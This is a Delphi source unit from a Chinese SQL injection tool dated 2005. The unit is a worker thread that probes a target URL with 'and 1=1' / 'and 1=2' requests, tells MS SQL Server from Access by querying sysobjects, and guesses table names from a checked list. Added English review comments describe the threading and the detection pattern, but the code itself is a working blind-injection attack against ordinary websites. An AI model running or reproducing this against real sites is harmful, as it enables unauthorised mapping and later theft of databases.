{##########################################
旁注入侵专用程序 3.0升级版
----------------------------------------
模块:SQL注入检测 - 检测表名
描述:该单元为检测表名的线程单元
作者:2005.3.20日下午 明小子
##########################################}
unit ScanTable;
interface
uses
Classes, GetHttpSize, SysUtils, StdCtrls, CheckLst, Dialogs;
type
{ Worker thread behind the "detect table name" step. The constructor stores the
  GUI controls the thread reads and writes; Execute sends the HTTP requests and
  hands every GUI update back to the main thread through Synchronize.
  Detection note: the request pair that differs only by "and 1=1" / "and 1=2"
  (URL-encoded) is the classic boolean-inference pattern that WAF/IDS rules match. }
MyScanTable = class(TThread)
private
SqlURL: TComboBox; // base URL; Text is read (Trim()med in most places)
SqlLog, SqlResultMem: TMemo; // request log and human-readable result output
SqlChkTable: TCheckListBox; // candidate names; only Checked items are probed
and1, and2, SqlDataType, ifor: integer; // and1/and2/SqlDataType hold values returned by Get_HttpSize; ifor is the index of the item currently probed
AddTable: TListBox; // receives each candidate whose probe value is >= and1
procedure ShowAnd1; // log the "and 1=1" request (main thread, via Synchronize)
procedure ShowAnd2; // log the "and 1=2" request (main thread, via Synchronize)
procedure ShowStr; // compare and1/and2, update MainForm, classify the database
procedure ShowStr2; // probe SqlChkTable.Items[ifor] and record a hit
protected
procedure Execute; override;
public
constructor Create(Url: TComboBox; Log, SqlResult: TMemo; ChkTable: TCheckListBox; Table: TListBox);
end;
implementation
uses MainUnit;
{ Wires the worker to the GUI controls it will read and update, then starts it
  at once (inherited Create(False)). The thread frees itself when it finishes. }
constructor MyScanTable.Create(Url: TComboBox; Log, SqlResult: TMemo; ChkTable: TCheckListBox; Table: TListBox);
begin
// Store the control references; the assignments are independent of each other.
Self.AddTable := Table;
Self.SqlChkTable := ChkTable;
Self.SqlResultMem := SqlResult;
Self.SqlLog := Log;
Self.SqlURL := Url;
// Let the thread object dispose of itself after Execute returns.
Self.FreeOnTerminate := True;
// Create(False) = not suspended: the worker starts running immediately.
inherited Create(False);
end;
// Appends the "and 1=1" request line to the log memo. Any exception while
// building or adding the line is reported with a message box naming this method.
procedure MyScanTable.ShowAnd1;
var
LogLine: string;
begin
try
LogLine := Format('%s and 1=1', [Trim(Self.SqlURL.Text)]);
Self.SqlLog.Lines.Add(LogLine);
except
showmessage('MyScanTable.ShowAnd1');
end;
end;
// Appends the "and 1=2" request line to the log memo. Any exception while
// building or adding the line is reported with a message box naming this method.
procedure MyScanTable.ShowAnd2;
var
LogLine: string;
begin
try
LogLine := Format('%s and 1=2', [Trim(Self.SqlURL.Text)]);
Self.SqlLog.Lines.Add(LogLine);
except
showmessage('MyScanTable.ShowAnd2');
end;
end;
{ Runs on the main thread (invoked through Synchronize). Uses the two values
  and1/and2 already collected by Execute to decide whether the URL responded
  differently to "1=1" and "1=2", reports the outcome, and on a positive result
  sends one more request to classify the database type.
  NOTE(review): the '数据库类型:MySql数据库' message is paired with RadMSSql and a
  probe of the sysobjects table, which points at MS SQL Server rather than MySQL;
  the label looks inconsistent with the radio button it sets. }
procedure MyScanTable.ShowStr;
begin
try
if and1 > and2 then
begin
MainForm.and1Num := and1;
SqlResultMem.Lines.Add('恭喜,该URL可以注入!');
MainForm.sql_EdUrl.Enabled := False;
// Network call made from the GUI thread, since this method runs inside
// Synchronize - presumably blocks the UI until it returns. The meaning of the
// second argument (1000) is not visible in this unit.
SqlDataType := Get_HttpSize(Trim(SqlURL.Text) + '%20and%20exists%20(select%20*%20from%20sysobjects)', 1000);
// Same comparison rule as the table probe: a value >= and1 counts as a hit.
if SqlDataType >= and1 then
begin
MainForm.RadMSSql.Checked := True;
SqlResultMem.Lines.Add('数据库类型:MySql数据库');
end
else
begin
MainForm.RadAccess.Checked := True;
SqlResultMem.Lines.Add('数据库类型:Access数据库');
end;
end
else
begin
// Negative result: re-enable the controls the user may want to retry with.
MainForm.sql_EdUrl.Enabled := True;
MainForm.FieldNameLst.Enabled := True;
MainForm.Sql_GuessField.Enabled := True;
MainForm.Sql_GuessCon.Enabled := True;
SqlResultMem.Lines.Add('检测失败,该URL不可以进行注入!');
end;
except
showmessage('MyScanTable.ShowStr');
end;
end;
{ Runs on the main thread (invoked through Synchronize) once per checked item.
  Probes SqlChkTable.Items[ifor], and when the returned value is >= and1 adds the
  name to AddTable and refreshes the group-box caption with the running count.
  NOTE(review): unlike Execute and ShowStr, the URL is used here without Trim();
  a trailing space in the combo box would change the request. The network call
  also runs on the GUI thread here, same as in ShowStr. }
procedure MyScanTable.ShowStr2;
begin
try
// ifor is the loop index set by Execute before each Synchronize call.
MainForm.Gauge1.Progress := ifor;
SqlLog.Lines.Add(SqlUrl.text + ' and exists (select * from ' + SqlChkTable.Items[ifor] + ')');
// Second argument (300) differs from the 1000 used in ShowStr; its meaning is not visible in this unit.
and2 := Get_HttpSize(SqlURL.text + '%20and%20exists%20(select%20*%20from%20' + SqlChkTable.Items[ifor] + ')', 300);
if and2 >= and1 then
begin
AddTable.Items.Add(SqlChkTable.Items[ifor]);
MainForm.RzGroupBox4.Caption := '表名:' + inttostr(AddTable.Items.Count) + '个';
AddTable.Refresh;
end;
except
showmessage('MyScanTable.ShowStr2');
end;
end;
{ Thread body. First collects the two baseline values (and1 for "1=1", and2 for
  "1=2"), lets ShowStr report them, and stops when and1 is not greater than and2.
  Otherwise walks every checked entry of SqlChkTable, probing each one via
  ShowStr2 on the main thread, with a 20 ms pause between items.
  NOTE(review): MainForm.ShowTableBool is written directly from this worker
  thread, whereas every other GUI/MainForm update goes through Synchronize;
  likewise the showmessage in the except block runs on the worker thread - both
  look inconsistent with the rest of the unit and worth confirming as safe. }
procedure MyScanTable.Execute;
var
i: integer;
begin
try
// Baseline requests; no second argument here, unlike ShowStr (1000) and ShowStr2 (300).
and1 := Get_HttpSize(Trim(SqlURL.Text) + '%20and%201=1');
Synchronize(ShowAnd1);
and2 := Get_HttpSize(Trim(SqlURL.Text) + '%20and%201=2');
Synchronize(ShowAnd2);
Synchronize(ShowStr);
// Same test ShowStr applied; a negative result ends the thread here.
if not (and1 > and2) then
begin
MainForm.ShowTableBool := False;
Exit;
end;
for i := 0 to SqlChkTable.Items.Count - 1 do
begin
// Honour a Terminate() request between items.
if Terminated then Exit;
if SqlChkTable.Checked[i] then
begin
ifor := i;
Synchronize(ShowStr2);
end;
sleep(20);
end;
except
showmessage(' for - ScanTable_Error');
end;
end;
end.